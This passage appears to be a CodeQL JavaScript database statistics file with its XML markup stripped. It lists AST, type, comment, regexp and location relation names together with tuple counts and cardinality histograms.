+@obj_expr +50958 + + +@function_expr +95744 + + +@seq_expr +2457 + + +@conditional_expr +8111 + + +@new_expr +19023 + + +@call_expr +487075 + + +@dot_expr +602582 + + +@index_expr +105192 + + +@neg_expr +11993 + + +@plus_expr +731 + + +@log_not_expr +19385 + + +@bit_not_expr +403 + + +@typeof_expr +4540 + + +@void_expr +51 + + +@delete_expr +1310 + + +@eq_expr +13468 + + +@neq_expr +5338 + + +@eqq_expr +17758 + + +@neqq_expr +5818 + + +@lt_expr +10254 + + +@le_expr +1503 + + +@gt_expr +5438 + + +@ge_expr +2527 + + +@lshift_expr +5655 + + +@rshift_expr +27749 + + +@urshift_expr +4331 + + +@add_expr +88032 + + +@sub_expr +10789 + + +@mul_expr +14075 + + +@div_expr +2496 + + +@mod_expr +655 + + +@bitor_expr +42853 + + +@xor_expr +503 + + +@bitand_expr +8538 + + +@in_expr +1135 + + +@instanceof_expr +1184 + + +@logand_expr +15892 + + +@logor_expr +12711 + + +@assign_expr +245084 + + +@assign_add_expr +6231 + + +@assign_sub_expr +823 + + +@assign_mul_expr +143 + + +@assign_div_expr +44 + + +@assign_mod_expr +17 + + +@assign_lshift_expr +57 + + +@assign_rshift_expr +86 + + +@assign_urshift_expr +96 + + +@assign_or_expr +586 + + +@assign_xor_expr +108 + + +@assign_and_expr +222 + + +@assignlogandexpr +1 + + +@assignlogorexpr +1 + + +@assignnullishcoalescingexpr +1 + + +@template_placeholder_tag +100 + + +@template_pipe_ref +100 + + +@generated_code_expr +100 + + +@satisfies_expr +100 + + +@preinc_expr +1792 + + +@postinc_expr +7103 + + +@predec_expr +457 + + +@postdec_expr +774 + + +@par_expr +86199 + + +@var_declarator +130843 + + +@arrow_function_expr +3730 + + +@spread_element +50 + + +@array_pattern +57 + + +@object_pattern +122 + + +@yield_expr +81 + + +@tagged_template_expr +27 + + +@template_literal +408 + + +@template_literal_typeexpr +100 + + +@template_element +639 + + +@array_comprehension_expr +3 + + +@generator_expr +1 + + +@for_in_comprehension_block +1 + + +@for_of_comprehension_block +3 + + +@legacy_letexpr +1 + + +@var_decl +250257 + + +@proper_varaccess +1295408 + + +@super_expr +11 + + +@newtarget_expr +1 + + +@import_meta_expr +1 + + +@named_import_specifier +4 + + +@import_default_specifier +4 + + +@import_namespace_specifier +2 + + +@named_export_specifier +5 + + +@export_default_specifier +5 + + +@export_namespace_specifier +5 + + +@export_assign_declaration +5 + + +@interface_declaration +5 + + +@type_alias_declaration +120 + + +@enum_declaration +252 + + +@external_module_declaration +100 + + +@external_module_reference +5 + + +@expression_with_type_arguments +45 + + +@prefix_type_assertion +1721 + + +@as_type_assertion +368 + + +@export_varaccess +15 + + +@decorator_list +2575 + + +@non_null_assertion +2159 + + +@dynamic_import +5 + + +@import_equals_declaration +5 + + +@namespace_declaration +5 + + +@namespace_scope +5 + + +@exp_expr +14075 + + +@assign_exp_expr +143 + + +@class_expr +41 + + +@scope +118172 + + +@global_scope +1 + + +@function_scope +116245 + + +@catch_scope +1272 + + +@module_scope +21 + + +@block_scope +584 + + +@for_scope +17 + + +@for_in_scope +28 + + +@comprehension_block_scope +4 + + +@class_expr_scope +41 + + +@class_decl_scope +2693 + + +@interface_scope +200 + + +@type_alias_scope +11 + + +@enum_scope +252 + + +@external_module_scope +100 + + +@mapped_type_scope +10 + + +@conditional_type_scope +100 + + +@variable +364388 + + +@local_type_name +23565 + + +@local_namespace_name +20832 + + +@property +142723 + + +@value_property +140856 + + +@property_getter +1529 + + +@property_setter +338 + + +@jsx_attribute +100 + + +@function_call_signature +2458 + + +@constructor_call_signature +37 + + +@index_signature +504 + + +@enum_member +2026 + + +@proper_field +16934 + + +@parameter_field +2693 + + +@static_initializer +100 + + +@local_type_access +25491 + + +@type_decl +2513 + + +@keyword_typeexpr +25306 + + +@string_literal_typeexpr +733 + + +@number_literal_typeexpr +3 + + +@boolean_literal_typeexpr +4 + + +@array_typeexpr +4579 + + +@union_typeexpr +852 + + +@intersection_typeexpr +27 + + +@parenthesized_typeexpr +62 + + +@tuple_typeexpr +98 + + +@keyof_typeexpr +3 + + +@indexed_access_typeexpr +3 + + +@qualified_type_access +3559 + + +@import_namespace_access +100 + + +@import_type_access +100 + + +@import_var_type_access +100 + + +@optional_typeexpr +100 + + +@rest_typeexpr +100 + + +@readonly_typeexpr +100 + + +@bigint_literal_typeexpr +100 + + +@generic_typeexpr +5220 + + +@type_label +3559 + + +@typeof_typeexpr +24 + + +@local_var_type_access +24 + + +@qualified_var_type_access +15 + + +@this_var_type_access +20 + + +@predicate_typeexpr +86 + + +@interface_typeexpr +1038 + + +@type_parameter +3463 + + +@plain_function_typeexpr +1674 + + +@local_namespace_access +4671 + + +@qualified_namespace_access +20 + + +@constructor_typeexpr +20 + + +@mapped_typeexpr +20 + + +@conditional_typeexpr +100 + + +@infer_typeexpr +100 + + +@comment +104947 + + +@any_type +1 + + +@string_type +1 + + +@number_type +1 + + +@union_type +1802 + + +@true_type +1 + + +@false_type +1 + + +@type_reference +12383 + + +@object_type +159099 + + +@canonical_type_variable_type +650 + + +@typeof_type +2903 + + +@void_type +1 + + +@undefined_type +1 + + +@null_type +1 + + +@never_type +1 + + +@plain_symbol_type +1 + + +@objectkeyword_type +1 + + +@intersection_type +369 + + +@tuple_type +307 + + +@lexical_type_variable_type +50 + + +@this_type +2731 + + +@number_literal_type +1244 + + +@string_literal_type +30638 + + +@unknown_type +100 + + +@bigint_type +100 + + +@bigint_literal_type +100 + + +@unique_symbol_type +100 + + +@root_symbol +2385 + + +@member_symbol +7223 + + +@other_symbol +584 + + +@function_signature_type +34698 + + +@constructor_signature_type +2646 + + +@slashslash_comment +76841 + + +@slashstar_comment +8834 + + +@doc_comment +19270 + + +@html_comment_start +1 + + +@htmlcommentend +1 + + +@line +1622184 + + +@js_parse_error +8 + + +@regexpterm +33197 + + +@regexp_alt +641 + + +@regexp_seq +3371 + + +@regexp_caret +826 + + +@regexp_dollar +637 + + +@regexp_wordboundary +99 + + +@regexp_nonwordboundary +3 + + +@regexp_positive_lookahead +15 + + +@regexp_negative_lookahead +12 + + +@regexp_star +1057 + + +@regexp_plus +1067 + + +@regexp_opt +478 + + +@regexp_range +146 + + +@regexp_dot +445 + + +@regexp_group +1692 + + +@regexp_normal_constant +15489 + + +@regexp_hex_escape +59 + + +@regexp_unicode_escape +264 + + +@regexp_dec_escape +7 + + +@regexp_oct_escape +1 + + +@regexp_ctrl_escape +599 + + +@regexp_char_class_escape +1573 + + +@regexp_id_escape +2613 + + +@regexp_backref +11 + + +@regexp_char_class +1473 + + +@regexp_char_range +619 + + +@regexp_positive_lookbehind +15 + + +@regexp_negative_lookbehind +12 + + +@regexp_unicode_property_escape +12 + + +@regexp_parse_error +122 + + +@token +8770869 + + +@token_eof +5312 + + +@token_null_literal +15526 + + +@token_boolean_literal +31654 + + +@token_numeric_literal +557620 + + +@token_string_literal +269555 + + +@token_regular_expression +2773 + + +@token_identifier +2268328 + + +@token_keyword +551767 + + +@token_punctuator +5068334 + + +@json_value +1643352 + + +@json_null +24 + + +@json_boolean +654 + + +@json_number +273113 + + +@json_string +752355 + + +@json_array +175925 + + +@json_object +441281 + + +@json_parse_error +1 + + +@entry_node +121542 + + +@exit_node +121542 + + +@guard_node +177785 + + +@jsdoc +19270 + + +@falsy_guard +86336 + + +@truthy_guard +91449 + + +@jsdoc_tag +29323 + + +@jsdoc_type_expr +22481 + + +@jsdoc_any_type_expr +292 + + +@jsdoc_null_type_expr +35 + + +@jsdoc_undefined_type_expr +287 + + +@jsdoc_unknown_type_expr +27 + + +@jsdoc_void_type_expr +8 + + +@jsdoc_named_type_expr +18639 + + +@jsdoc_applied_type_expr +303 + + +@jsdoc_nullable_type_expr +310 + + +@jsdoc_non_nullable_type_expr +536 + + +@jsdoc_record_type_expr +91 + + +@jsdoc_array_type_expr +19 + + +@jsdoc_union_type_expr +668 + + +@jsdoc_function_type_expr +316 + + +@jsdoc_optional_type_expr +895 + + +@jsdoc_rest_type_expr +55 + + +@jsdoc_error +1658 + + +@yaml_node +885 + + +@yaml_scalar_node +700 + + +@yaml_mapping_node +149 + + +@yaml_sequence_node +35 + + +@yaml_alias_node +1 + + +@yaml_error +1 + + +@jsx_element +1090 + + +@jsx_qualified_name +100 + + +@jsx_empty_expr +100 + + +@await_expr +100 + + +@function_sent_expr +100 + + +@decorator +100 + + +@bind_expr +100 + + +@bigint_literal +100 + + +@nullishcoalescing_expr +100 + + +@e4x_xml_anyname +100 + + +@e4x_xml_static_attribute_selector +100 + + +@e4x_xml_dynamic_attribute_selector +100 + + +@e4x_xml_filter_expression +100 + + +@e4x_xml_static_qualident +100 + + +@e4x_xml_dynamic_qualident +100 + + +@e4x_xml_dotdotexpr +100 + + +@xmldtd +1 + + +@xmlelement +1270313 + + +@xmlattribute +1202020 + + +@xmlnamespace +4185 + + +@xmlcomment +26812 + + +@xmlcharacters +439958 + + +@optionalchainable +100 + + +@nullishcoalescing_expr +100 + + +@config +69795 + + +@configName +69794 + + +@configValue +69691 + + + + + +locations_default +id +15664049 + + +id +15664049 + + +file +6457 + + +beginLine +277405 + + +beginColumn +117878 + + +endLine +277405 + + +endColumn +117868 + + + + +id +file + + +12 + + +1 +2 +15664049 + + + + + + +id +beginLine + + +12 + + +1 +2 +15664049 + + + + + + +id +beginColumn + + +12 + + +1 +2 +15664049 + + + + + + +id +endLine + + +12 + + +1 +2 +15664049 + + + + + + +id +endColumn + + +12 + + +1 +2 +15664049 + + + + + + +file +id + + +12 + + +1 +2 +674 + + +2 +28 +501 + + +28 +105 +488 + + +105 +211 +488 + + +211 +335 +490 + + +335 +477 +485 + + +477 +637 +488 + + +637 +856 +486 + + +856 +1141 +485 + + +1141 +1602 +485 + + +1604 +2336 +486 + + +2336 +4472 +485 + + +4472 +2368854 +416 + + + + + + +file +beginLine + + +12 + + +1 +2 +674 + + +2 +13 +509 + + +13 +23 +513 + + +23 +35 +516 + + +35 +50 +504 + + +50 +69 +506 + + +69 +92 +489 + + +92 +124 +504 + + +124 +165 +487 + + +165 +230 +490 + + +230 +357 +491 + + +357 +737 +485 + + +737 +277406 +289 + + + + + + +file +beginColumn + + +12 + + +1 +2 +674 + + +2 +12 +491 + + +12 +32 +495 + + +32 +46 +510 + + +46 +56 +498 + + +56 +62 +488 + + +62 +67 +500 + + +67 +71 +477 + + +71 +75 +583 + + +75 +78 +497 + + +78 +80 +403 + + +80 +82 +543 + + +82 +117856 +298 + + + + + + +file +endLine + + +12 + + +1 +2 +674 + + +2 +13 +509 + + +13 +23 +509 + + +23 +35 +520 + + +35 +50 +504 + + +50 +69 +506 + + +69 +92 +489 + + +92 +124 +504 + + +124 +165 +487 + + +165 +230 +490 + + +230 +357 +491 + + +357 +737 +485 + + +737 +277406 +289 + + + + + + +file +endColumn + + +12 + + +1 +2 +682 + + +2 +18 +501 + + +18 +36 +487 + + +36 +51 +513 + + +51 +61 +532 + + +61 +67 +508 + + +67 +72 +568 + + +72 +75 +444 + + +75 +78 +514 + + +78 +80 +484 + + +80 +81 +283 + + +81 +82 +579 + + +82 +117837 +362 + + + + + + +beginLine +id + + +12 + + +1 +6 +666 + + +7 +8 +116499 + + +8 +14 +19181 + + +14 +15 +29298 + + +15 +19 +25329 + + +19 +24 +17273 + + +24 +29 +22410 + + +29 +56 +21150 + + +56 +242 +20830 + + +242 +134468 +4769 + + + + + + +beginLine +file + + +12 + + +1 +2 +117975 + + +2 +3 +120803 + + +3 +8 +21079 + + +8 +6458 +17548 + + + + + + +beginLine +beginColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +11 +19126 + + +11 +12 +32612 + + +12 +15 +18313 + + +15 +17 +18964 + + +17 +21 +21845 + + +21 +31 +21197 + + +31 +64 +20988 + + +64 +94454 +7194 + + + + + + +beginLine +endLine + + +12 + + +1 +2 +238980 + + +2 +3 +22312 + + +3 +890 +16113 + + + + + + +beginLine +endColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +12 +20939 + + +12 +13 +28687 + + +13 +16 +19707 + + +16 +18 +20057 + + +18 +22 +21035 + + +22 +33 +21605 + + +33 +69 +21089 + + +69 +94455 +7120 + + + + + + +beginColumn +id + + +12 + + +1 +2 +5117 + + +2 +3 +9246 + + +3 +4 +13440 + + +4 +5 +15857 + + +5 +6 +13813 + + +6 +7 +11696 + + +7 +8 +8777 + + +8 +9 +6887 + + +9 +11 +9723 + + +11 +14 +10392 + + +14 +20 +9364 + + +20 +2248970 +3566 + + + + + + +beginColumn +file + + +12 + + +1 +2 +68610 + + +2 +3 +15842 + + +3 +4 +7965 + + +4 +5 +9221 + + +5 +6 +8014 + + +6 +6458 +8226 + + + + + + +beginColumn +beginLine + + +12 + + +1 +2 +6868 + + +2 +3 +15317 + + +3 +4 +24725 + + +4 +5 +25386 + + +5 +6 +10178 + + +6 +7 +6239 + + +7 +9 +10825 + + +9 +11 +9294 + + +11 +1255 +8841 + + +1258 +277405 +205 + + + + + + +beginColumn +endLine + + +12 + + +1 +2 +6868 + + +2 +3 +15317 + + +3 +4 +24725 + + +4 +5 +25386 + + +5 +6 +10175 + + +6 +7 +6232 + + +7 +9 +10827 + + +9 +11 +9299 + + +11 +1227 +8842 + + +1256 +277405 +207 + + + + + + +beginColumn +endColumn + + +12 + + +1 +2 +24039 + + +2 +3 +21662 + + +3 +4 +22809 + + +4 +5 +17118 + + +5 +6 +12038 + + +6 +7 +7768 + + +7 +10 +9297 + + +10 +1064 +3147 + + + + + + +endLine +id + + +12 + + +1 +6 +666 + + +7 +8 +116499 + + +8 +14 +18715 + + +14 +15 +30262 + + +15 +19 +24946 + + +19 +24 +17066 + + +24 +29 +22451 + + +29 +56 +21060 + + +56 +237 +20821 + + +237 +134470 +4919 + + + + + + +endLine +file + + +12 + + +1 +2 +117975 + + +2 +3 +120803 + + +3 +8 +21076 + + +8 +6458 +17551 + + + + + + +endLine +beginLine + + +12 + + +1 +2 +243883 + + +2 +4 +23431 + + +4 +71 +10091 + + + + + + +endLine +beginColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +11 +19057 + + +11 +12 +32046 + + +12 +15 +18779 + + +15 +17 +18710 + + +17 +21 +21785 + + +21 +31 +21103 + + +31 +63 +20930 + + +63 +94454 +7829 + + + + + + +endLine +endColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +12 +21177 + + +12 +13 +28718 + + +13 +16 +19585 + + +16 +18 +21210 + + +18 +23 +23344 + + +23 +35 +21013 + + +35 +80 +20938 + + +80 +94454 +4254 + + + + + + +endColumn +id + + +12 + + +1 +2 +4439 + + +2 +3 +8489 + + +3 +4 +12884 + + +4 +5 +16048 + + +5 +6 +15554 + + +6 +7 +12546 + + +7 +8 +9231 + + +8 +9 +6405 + + +9 +11 +9266 + + +11 +14 +10367 + + +14 +20 +9186 + + +20 +489713 +3453 + + + + + + +endColumn +file + + +12 + + +1 +2 +68569 + + +2 +3 +15919 + + +3 +4 +7876 + + +4 +5 +9221 + + +5 +6 +8062 + + +6 +6458 +8221 + + + + + + +endColumn +beginLine + + +12 + + +1 +2 +6848 + + +2 +3 +15273 + + +3 +4 +24807 + + +4 +5 +25343 + + +5 +6 +10180 + + +6 +7 +6269 + + +7 +9 +10857 + + +9 +11 +9251 + + +11 +1768 +8841 + + +1780 +212575 +199 + + + + + + +endColumn +beginColumn + + +12 + + +1 +2 +15842 + + +2 +3 +27460 + + +3 +4 +26707 + + +4 +5 +18639 + + +5 +6 +11518 + + +6 +8 +10766 + + +8 +265 +6936 + + + + + + +endColumn +endLine + + +12 + + +1 +2 +6850 + + +2 +3 +15271 + + +3 +4 +24807 + + +4 +5 +25343 + + +5 +6 +10180 + + +6 +7 +6269 + + +7 +9 +10858 + + +9 +11 +9252 + + +11 +1789 +8841 + + +1795 +212360 +197 + + + + + + + + +numlines +122044 + + +element_id +122044 + + +num_lines +1136 + + +num_code +939 + + +num_comment +418 + + + + +element_id +num_lines + + +12 + + +1 +2 +122044 + + + + + + +element_id +num_code + + +12 + + +1 +2 +122044 + + + + + + +element_id +num_comment + + +12 + + +1 +2 +122044 + + + + + + +num_lines +element_id + + +12 + + +1 +2 +399 + + +2 +3 +144 + + +3 +4 +97 + + +4 +6 +91 + + +6 +9 +86 + + +9 +15 +90 + + +15 +36 +86 + + +36 +174 +86 + + +175 +21589 +57 + + + + + + +num_lines +num_code + + +12 + + +1 +2 +444 + + +2 +3 +140 + + +3 +4 +95 + + +4 +6 +87 + + +6 +9 +85 + + +9 +14 +88 + + +14 +24 +90 + + +24 +33 +89 + + +33 +38 +18 + + + + + + +num_lines +num_comment + + +12 + + +1 +2 +444 + + +2 +3 +140 + + +3 +4 +94 + + +4 +6 +92 + + +6 +9 +90 + + +9 +14 +90 + + +14 +20 +89 + + +20 +27 +89 + + +27 +30 +8 + + + + + + +num_code +element_id + + +12 + + +1 +2 +317 + + +2 +3 +125 + + +3 +4 +67 + + +4 +5 +61 + + +5 +8 +67 + + +8 +12 +73 + + +12 +26 +72 + + +26 +69 +71 + + +69 +1540 +71 + + +1747 +22000 +15 + + + + + + +num_code +num_lines + + +12 + + +1 +2 +349 + + +2 +3 +118 + + +3 +4 +77 + + +4 +6 +76 + + +6 +10 +84 + + +10 +19 +78 + + +19 +31 +79 + + +31 +44 +73 + + +44 +52 +5 + + + + + + +num_code +num_comment + + +12 + + +1 +2 +347 + + +2 +3 +121 + + +3 +4 +79 + + +4 +6 +74 + + +6 +9 +74 + + +9 +16 +80 + + +16 +23 +72 + + +23 +31 +76 + + +31 +40 +16 + + + + + + +num_comment +element_id + + +12 + + +1 +2 +147 + + +2 +3 +67 + + +3 +4 +26 + + +4 +5 +26 + + +5 +7 +32 + + +7 +12 +34 + + +12 +32 +34 + + +33 +135 +32 + + +150 +93795 +20 + + + + + + +num_comment +num_lines + + +12 + + +1 +2 +171 + + +2 +3 +57 + + +3 +4 +32 + + +4 +5 +24 + + +5 +8 +33 + + +8 +18 +35 + + +19 +47 +32 + + +52 +253 +33 + + +362 +363 +1 + + + + + + +num_comment +num_code + + +12 + + +1 +2 +174 + + +2 +3 +54 + + +3 +4 +33 + + +4 +5 +22 + + +5 +8 +33 + + +8 +18 +36 + + +19 +47 +32 + + +51 +230 +32 + + +232 +346 +2 + + + + + + + + +files +id +6457 + + +id +6457 + + +name +6457 + + + + +id +name + + +12 + + +1 +2 +6457 + + + + + + +name +id + + +12 + + +1 +2 +6457 + + + + + + + + +folders +id +1590 + + +id +1590 + + +name +1590 + + + + +id +name + + +12 + + +1 +2 +1590 + + + + + + +name +id + + +12 + + +1 +2 +1590 + + + + + + + + +containerparent +child +8046 + + +parent +1590 + + +child +8046 + + + + +parent +child + + +12 + + +1 +2 +525 + + +2 +3 +326 + + +3 +4 +207 + + +4 +5 +128 + + +5 +7 +138 + + +7 +11 +132 + + +11 +53 +120 + + +60 +335 +14 + + + + + + +child +parent + + +12 + + +1 +2 +8046 + + + + + + + + +externalData +5684 + + +id +950 + + +path +3 + + +column +6 + + +value +790 + + + + +id +path + + +12 + + +1 +2 +950 + + + + + + +id +column + + +12 + + +2 +3 +4 + + +6 +7 +946 + + + + + + +id +value + + +12 + + +2 +6 +8 + + +6 +7 +942 + + + + + + +path +id + + +12 + + +4 +5 +1 + + +72 +73 +1 + + +874 +875 +1 + + + + + + +path +column + + +12 + + +2 +3 +1 + + +6 +7 +2 + + + + + + +path +value + + +12 + + +8 +9 +1 + + +86 +87 +1 + + +722 +723 +1 + + + + + + +column +id + + +12 + + +946 +947 +4 + + +950 +951 +2 + + + + + + +column +path + + +12 + + +2 +3 +4 + + +3 +4 +2 + + + + + + +column +value + + +12 + + +2 +3 +1 + + +6 +7 +1 + + +31 +32 +1 + + +93 +94 +1 + + +117 +118 +1 + + +620 +621 +1 + + + + + + +value +id + + +12 + + +1 +2 +478 + + +2 +3 +132 + + +3 +5 +69 + + +5 +16 +61 + + +16 +928 +50 + + + + + + +value +path + + +12 + + +1 +2 +764 + + +2 +3 +26 + + + + + + +value +column + + +12 + + +1 +2 +711 + + +2 +3 +79 + + + + + + + + +sourceLocationPrefix +1 + + +prefix +1 + + + + + +toplevels +id +5320 + + +id +5320 + + +kind +4 + + + + +id +kind + + +12 + + +1 +2 +5320 + + + + + + +kind +id + + +12 + + +3 +4 +1 + + +31 +32 +1 + + +86 +87 +1 + + +5200 +5201 +1 + + + + + + + + +is_externs +44 + + +toplevel +44 + + + + + +is_instantiated +5 + + +decl +5 + + + + + +has_declare_keyword +66 + + +stmt +66 + + + + + +has_asserts_keyword +66 + + +node +66 + + + + + +is_abstract_member +66 + + +id +66 + + + + + +has_public_keyword +9297 + + +id +9297 + + + + + +has_private_keyword +11391 + + +id +11391 + + + + + +has_protected_keyword +1048 + + +id +1048 + + + + + +has_readonly_keyword +2338 + + +id +2338 + + + + + +has_type_keyword +1000 + + +id +1000 + + + + + +is_optional_member +3668 + + +id +3668 + + + + + +has_definite_assignment_assertion +100 + + +id +100 + + + + + +is_optional_parameter_declaration +3966 + + +parameter +3966 + + + + + +parameter_fields +2693 + + +field +2693 + + +constructor +1020 + + +param_index +20 + + + + +field +constructor + + +12 + + +1 +2 +2693 + + + + + + +field +param_index + + +12 + + +1 +2 +2693 + + + + + + +constructor +field + + +12 + + +1 +2 +439 + + +2 +3 +233 + + +3 +4 +118 + + +4 +5 +78 + + +5 +7 +83 + + +7 +21 +69 + + + + + + +constructor +param_index + + +12 + + +1 +2 +439 + + +2 +3 +233 + + +3 +4 +118 + + +4 +5 +78 + + +5 +7 +83 + + +7 +21 +69 + + + + + + +param_index +field + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +15 +16 +1 + + +22 +23 +1 + + +29 +30 +1 + + +36 +37 +1 + + +48 +49 +1 + + +69 +70 +1 + + +104 +105 +1 + + +152 +153 +1 + + +230 +231 +1 + + +348 +349 +1 + + +581 +582 +1 + + +1020 +1021 +1 + + + + + + +param_index +constructor + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +15 +16 +1 + + +22 +23 +1 + + +29 +30 +1 + + +36 +37 +1 + + +48 +49 +1 + + +69 +70 +1 + + +104 +105 +1 + + +152 +153 +1 + + +230 +231 +1 + + +348 +349 +1 + + +581 +582 +1 + + +1020 +1021 +1 + + + + + + + + +is_const_enum +62 + + +id +62 + + + + + +is_abstract_class +116 + + +id +116 + + + + + +typeexprs +54050 + + +id +54050 + + +kind +6 + + +parent +29264 + + +idx +26 + + +tostring +3278 + + + + +id +kind + + +12 + + +1 +2 +54050 + + + + + + +id +parent + + +12 + + +1 +2 +54050 + + + + + + +id +idx + + +12 + + +1 +2 +54050 + + + + + + +id +tostring + + +12 + + +1 +2 +54050 + + + + + + +kind +id + + +12 + + +3 +4 +1 + + +4 +5 +1 + + +733 +734 +1 + + +2513 +2514 +1 + + +25306 +25307 +1 + + +25491 +25492 +1 + + + + + + +kind +parent + + +12 + + +3 +4 +1 + + +4 +5 +1 + + +733 +734 +1 + + +2513 +2514 +1 + + +16661 +16662 +1 + + +17601 +17602 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +4 +5 +1 + + +19 +20 +1 + + +25 +26 +1 + + + + + + +kind +tostring + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +9 +10 +1 + + +242 +243 +1 + + +2075 +2076 +1 + + +2322 +2323 +1 + + + + + + +parent +id + + +12 + + +1 +2 +15321 + + +2 +3 +7887 + + +3 +4 +3725 + + +4 +9 +2229 + + +9 +24 +102 + + + + + + +parent +kind + + +12 + + +1 +2 +21285 + + +2 +3 +7707 + + +3 +4 +272 + + + + + + +parent +idx + + +12 + + +1 +2 +15321 + + +2 +3 +7887 + + +3 +4 +3725 + + +4 +9 +2229 + + +9 +24 +102 + + + + + + +parent +tostring + + +12 + + +1 +2 +16315 + + +2 +3 +8432 + + +3 +4 +3126 + + +4 +22 +1391 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +7 +2 + + +10 +12 +2 + + +13 +22 +2 + + +27 +38 +2 + + +54 +61 +2 + + +101 +212 +2 + + +356 +530 +2 + + +859 +1645 +2 + + +2513 +2519 +2 + + +3330 +7198 +2 + + +15305 +19237 +2 + + + + + + +idx +kind + + +12 + + +1 +2 +7 + + +2 +3 +14 + + +3 +4 +2 + + +4 +5 +3 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +7 +2 + + +10 +12 +2 + + +13 +22 +2 + + +27 +38 +2 + + +54 +61 +2 + + +101 +212 +2 + + +356 +530 +2 + + +859 +1645 +2 + + +2513 +2519 +2 + + +3330 +7198 +2 + + +15305 +19237 +2 + + + + + + +idx +tostring + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +6 +2 + + +9 +10 +2 + + +12 +17 +2 + + +18 +26 +2 + + +28 +31 +2 + + +37 +44 +2 + + +60 +71 +2 + + +108 +196 +2 + + +395 +667 +2 + + +746 +978 +2 + + +1522 +2076 +2 + + + + + + +tostring +id + + +12 + + +1 +2 +1085 + + +2 +3 +627 + + +3 +4 +344 + + +4 +5 +322 + + +5 +7 +292 + + +7 +12 +260 + + +12 +45 +247 + + +45 +7788 +101 + + + + + + +tostring +kind + + +12 + + +1 +2 +1903 + + +2 +3 +1375 + + + + + + +tostring +parent + + +12 + + +1 +2 +1097 + + +2 +3 +631 + + +3 +4 +341 + + +4 +5 +327 + + +5 +7 +292 + + +7 +12 +253 + + +12 +48 +246 + + +48 +6190 +91 + + + + + + +tostring +idx + + +12 + + +1 +2 +1450 + + +2 +3 +939 + + +3 +4 +481 + + +4 +6 +289 + + +6 +19 +119 + + + + + + + + +is_for_await_of +1 + + +forof +1 + + + + + +is_module +21 + + +tl +21 + + + + + +is_es2015_module +21 + + +tl +21 + + + + + +is_closure_module +21 + + +tl +21 + + + + + +toplevel_parent_xml_node +43 + + +toplevel +43 + + +xmlnode +43 + + + + +toplevel +xmlnode + + +12 + + +1 +2 +43 + + + + + + +xmlnode +toplevel + + +12 + + +1 +2 +43 + + + + + + + + +xml_element_parent_expression +1 + + +xmlnode +1 + + +expression +1 + + +index +1 + + + + +xmlnode +expression + + +12 + + +1 +2 +1 + + + + + + +xmlnode +index + + +12 + + +1 +2 +1 + + + + + + +expression +xmlnode + + +12 + + +1 +2 +1 + + + + + + +expression +index + + +12 + + +1 +2 +1 + + + + + + +index +xmlnode + + +12 + + +1 +2 +1 + + + + + + +index +expression + + +12 + + +1 +2 +1 + + + + + + + + +is_nodejs +12 + + +tl +12 + + + + + +stmts +id +1096691 + + +id +1096691 + + +kind +31 + + +parent +412140 + + +idx +152947 + + +tostring +284956 + + + + +id +kind + + +12 + + +1 +2 +1096691 + + + + + + +id +parent + + +12 + + +1 +2 +1096691 + + + + + + +id +idx + + +12 + + +1 +2 +1096691 + + + + + + +id +tostring + + +12 + + +1 +2 +1096691 + + + + + + +kind +id + + +12 + + +1 +2 +3 + + +3 +5 +2 + + +5 +9 +2 + + +31 +42 +2 + + +61 +552 +2 + + +1118 +1137 +2 + + +1272 +1316 +2 + + +1316 +1379 +2 + + +1471 +1570 +2 + + +1642 +2306 +2 + + +3120 +5386 +2 + + +8674 +10150 +2 + + +16771 +48210 +2 + + +68214 +105607 +2 + + +204994 +610341 +2 + + + + + + +kind +parent + + +12 + + +1 +2 +4 + + +3 +5 +2 + + +5 +6 +2 + + +35 +59 +2 + + +298 +424 +2 + + +738 +1157 +2 + + +1253 +1263 +2 + + +1271 +1321 +2 + + +1495 +1568 +2 + + +1642 +2306 +2 + + +2999 +4416 +2 + + +4734 +10123 +2 + + +48139 +48347 +2 + + +50857 +162082 +2 + + +191077 +191078 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +3 + + +2 +3 +2 + + +3 +4 +2 + + +8 +9 +2 + + +10 +12 +2 + + +16 +22 +2 + + +28 +32 +2 + + +36 +37 +2 + + +39 +51 +2 + + +54 +63 +2 + + +65 +67 +2 + + +116 +118 +2 + + +122 +138 +2 + + +251 +1564 +2 + + +1967 +152946 +2 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +2 +3 +2 + + +4 +11 +2 + + +12 +17 +2 + + +88 +104 +2 + + +147 +168 +2 + + +239 +296 +2 + + +356 +428 +2 + + +591 +705 +2 + + +811 +829 +2 + + +1092 +2254 +2 + + +2665 +10292 +2 + + +18023 +21916 +2 + + +43911 +180066 +2 + + + + + + +parent +id + + +12 + + +1 +2 +265890 + + +2 +3 +69435 + + +3 +4 +25109 + + +4 +8 +34966 + + +8 +152946 +16740 + + + + + + +parent +kind + + +12 + + +1 +2 +319546 + + +2 +3 +67918 + + +3 +23 +24676 + + + + + + +parent +idx + + +12 + + +1 +2 +265890 + + +2 +3 +69435 + + +3 +4 +25109 + + +4 +8 +34966 + + +8 +152946 +16740 + + + + + + +parent +tostring + + +12 + + +1 +2 +275359 + + +2 +3 +62818 + + +3 +4 +25781 + + +4 +8 +34293 + + +8 +19511 +13889 + + + + + + +idx +id + + +12 + + +1 +2 +149939 + + +2 +220361 +3008 + + + + + + +idx +kind + + +12 + + +1 +2 +149940 + + +2 +28 +3007 + + + + + + +idx +parent + + +12 + + +1 +2 +149939 + + +2 +220361 +3008 + + + + + + +idx +tostring + + +12 + + +1 +2 +149939 + + +2 +88922 +3008 + + + + + + +tostring +id + + +12 + + +1 +2 +186537 + + +2 +3 +48494 + + +3 +5 +24651 + + +5 +37 +21526 + + +37 +72175 